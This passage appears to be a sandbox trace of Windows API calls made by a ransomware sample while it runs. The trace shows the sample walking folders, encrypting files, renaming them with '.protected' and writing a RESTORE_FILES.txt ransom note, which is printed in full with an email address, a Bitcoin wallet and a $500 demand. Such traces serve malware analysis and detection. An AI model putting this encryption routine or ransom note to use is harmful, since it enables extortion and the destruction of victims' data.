cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.799] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0076.799] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0076.799] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0076.799] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0076.800] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.801] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x29a, lpOverlapped=0x0) returned 1 [0076.801] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.801] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.801] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.801] CloseHandle (hObject=0xb4) returned 1 [0076.801] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.protected") returned 91 [0076.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.protected")) returned 1 [0076.803] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Windows") returned -1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files") returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files (x86)") returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="$Recycle.bin") returned 1 [0076.803] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="System Volume Information") returned 1 [0076.803] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.803] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch=".protected") returned 0x0 [0076.803] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="RESTORE_FILES.txt") returned 1 [0076.803] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.803] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.803] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.804] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.804] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".txt") returned 0x0 [0076.804] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.804] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".rar") returned 0x0 [0076.804] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 88 [0076.804] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".zip") returned 0x0 [0076.804] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.820] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.821] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.821] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.821] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.824] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.824] CloseHandle (hObject=0xb4) returned 1 [0076.824] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.protected") returned 98 [0076.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.protected" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.protected")) returned 1 [0076.825] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.825] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.825] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\RESTORE_FILES.txt") returned 89 [0076.825] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.851] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.851] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.851] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.851] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.852] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.852] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0076.852] CloseHandle (hObject=0xa4) returned 1 [0076.852] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="Windows") returned -1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="Program Files") returned -1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="Program Files (x86)") returned -1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="$Recycle.bin") returned 1 [0076.852] lstrcmpiW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="System Volume Information") returned -1 [0076.852] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 71 [0076.852] lstrcmpW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2=".") returned 1 [0076.852] lstrcmpW (lpString1="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="..") returned 1 [0076.852] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*") returned 73 [0076.852] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.853] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.853] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.853] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\.") returned 73 [0076.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.853] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.853] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.853] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.853] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.853] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.853] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.853] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\..") returned 74 [0076.853] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.853] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0076.853] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0076.853] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.853] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0076.853] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0076.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.853] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.853] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.854] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.854] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0076.854] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.854] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0076.854] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0076.854] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0076.854] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.866] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.866] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.866] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.866] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.866] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.866] CloseHandle (hObject=0xb4) returned 1 [0076.867] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.protected") returned 91 [0076.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.protected")) returned 1 [0076.867] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="Windows") returned -1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="Program Files") returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="Program Files (x86)") returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="$Recycle.bin") returned 1 [0076.867] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="System Volume Information") returned 1 [0076.867] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.867] StrStrIW (lpFirst="VC_redist.x86.exe", lpSrch=".protected") returned 0x0 [0076.867] lstrcmpW (lpString1="VC_redist.x86.exe", lpString2="RESTORE_FILES.txt") returned 1 [0076.867] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.868] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.868] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.868] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".txt") returned 0x0 [0076.868] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.868] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".rar") returned 0x0 [0076.868] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0076.868] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".zip") returned 0x0 [0076.868] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.901] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.901] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.901] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.901] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.967] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.967] CloseHandle (hObject=0xb4) returned 1 [0076.968] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.protected") returned 99 [0076.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.protected" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.protected")) returned 1 [0076.968] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.968] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.969] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\RESTORE_FILES.txt") returned 89 [0076.969] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0077.092] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0077.092] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0077.093] lstrlenA 